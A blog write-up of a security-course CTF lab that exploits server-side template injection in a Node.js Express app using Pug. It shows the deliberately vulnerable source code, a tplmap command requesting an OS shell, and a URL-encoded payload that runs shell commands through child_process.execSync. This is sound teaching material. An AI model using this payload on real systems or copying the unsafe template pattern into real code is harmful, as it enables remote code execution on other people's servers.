Simple Web 0x22(Lab - Pug)

Posted on 2023-02-18 | Post modified | In Security Course｜NTUST WS｜SSTI |

Simple Web 0x22(Lab - Pug)

tags: `NTUSTWS` `CTF` `Web`

Challenge: http://h4ck3r.quest:8008

Source code

const express = require('express');
const pug = require('pug');

const app = express();

const template = `
h1 Hello %NAME%
form(method='GET' action='/')
  div
    label(for='nickname') Name:
    input#nickname(type='text', placeholder='Nickname' name='name')
    button(type='submit') Submit 
  a(href='/source') Source Code
`;

app.get('/', (req, res) => {
    const name = (req.query.name ?? 'Anonymous').toString();
    if (name.includes('{')) return res.send('Nice try');
    let html = pug.render(template.replace('%NAME%', name));
    res.set('Content-Type', 'text/html');
    res.send(html);
});

app.get("/source", (_, res) => {
    res.sendFile(__filename);
});

app.listen(3000, () => console.log(':3000'));

Exploit - `tqlmap`

$ ./tplmap.py --engine pug --os-shell -u "http://h4ck3r.quest:8008/?name=bob"

Using wireshark to trace the payload. You must let the template be like:

  const template = `
  h1 Hello %NAME%
  = global.process.mainModule.require('child_process').execSync(Buffer('bHM=', 'base64').toString())
  form(method='GET' action='/')
    div
      label(for='nickname') Name:
      input#nickname(type='text', placeholder='Nickname' name='name')
      button(type='submit') Submit 
    a(href='/source') Source Code
  `;

Including a new line and an equal sign, Payload:

  %0A%3D%20global.process.mainModule.require%28%27child_process%27%29.execSync%28Buffer%28%27bHM%3D%27%2C%2B%27base64%27%29.toString%28%29%29

which is

  = global.process.mainModule.require('child_process').execSync(Buffer('bHM=',+'base64').toString())

Note that bHM= is command ls in base64 format

Reference

Post author: SBK6401
Post link: https://bernie6401.github.io/Simple-Web-0x22(Lab-Pug)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.